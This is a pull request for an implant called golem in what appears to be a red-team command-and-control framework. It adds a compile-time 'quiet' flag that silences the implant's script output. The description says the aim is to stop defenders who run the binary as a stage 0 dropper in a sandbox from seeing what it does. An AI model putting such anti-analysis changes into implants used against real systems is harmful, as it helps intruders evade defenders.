### PR TITLE
feat: Add quiet feature flag to golem

### DIFF
--- a/implants/golem/Cargo.toml
+++ b/implants/golem/Cargo.toml
@@ -3,6 +3,9 @@ name = "golem"
 version = "0.4.0"
 edition = "2024"
 
+[features]
+quiet = []
+
 [dependencies]
 clap = { workspace = true }
 anyhow = { workspace = true }

--- a/implants/golem/src/main.rs
+++ b/implants/golem/src/main.rs
@@ -8,6 +8,9 @@ use eldritch::assets::{
     std::{EmbeddedAssets, StdAssetsLibrary},
 };
 use eldritch::conversion::ToValue;
+#[cfg(feature = "quiet")]
+use eldritch::{ForeignValue, Interpreter, NoopPrinter};
+#[cfg(not(feature = "quiet"))]
 use eldritch::{ForeignValue, Interpreter, StdoutPrinter};
 use eldritch_agent::Context;
 use pb::c2::TaskContext;
@@ -42,7 +45,10 @@ fn new_runtime(assetlib: impl ForeignValue + 'static) -> Interpreter {
     // Register the libraries that we need. Basically the same as interp.with_task_context but
     // with our custom assets library
     let agent = Arc::new(AgentFake {});
+    #[cfg(not(feature = "quiet"))]
     let mut interp = Interpreter::new_with_printer(Arc::new(StdoutPrinter)).with_default_libs();
+    #[cfg(feature = "quiet")]
+    let mut interp = Interpreter::new_with_printer(Arc::new(NoopPrinter)).with_default_libs();
     let task_context = TaskContext {
         task_id: 0,
         jwt: String::new(),


### PR DESCRIPTION
## Summary

Same implementation as #2246 but for golem.

Adds a `quiet` compile-time Cargo feature flag to golem that suppresses all Eldritch print/eprint output when running tomes.

When `--features quiet` is enabled, the golem interpreter uses `NoopPrinter` instead of `StdoutPrinter`, so embedded tomes run silently with no terminal output.

When running `golem` with embedded tomes (or passing tome files directly), the tomes print status messages to stdout via the default `StdoutPrinter`. If golem is being used as a stage 0 dropper, stdout might expose how the underlying functionality of the tomes operates for blue teamers if they get their hands on the binary and run it in a sandbox. Debug statements are nice to have within the tomes themselves for troubleshooting, but having a way at compile time to discard all output is useful for running golem in prod without having to go comment out all the debug statements in the eldritch files.

This is a compile-time opt-in (`quiet` is not in the default feature set), so existing builds are unaffected.

## Files Changed

- `implants/golem/Cargo.toml` — add `quiet` feature
- `implants/golem/src/main.rs` — gate printer selection on `quiet` feature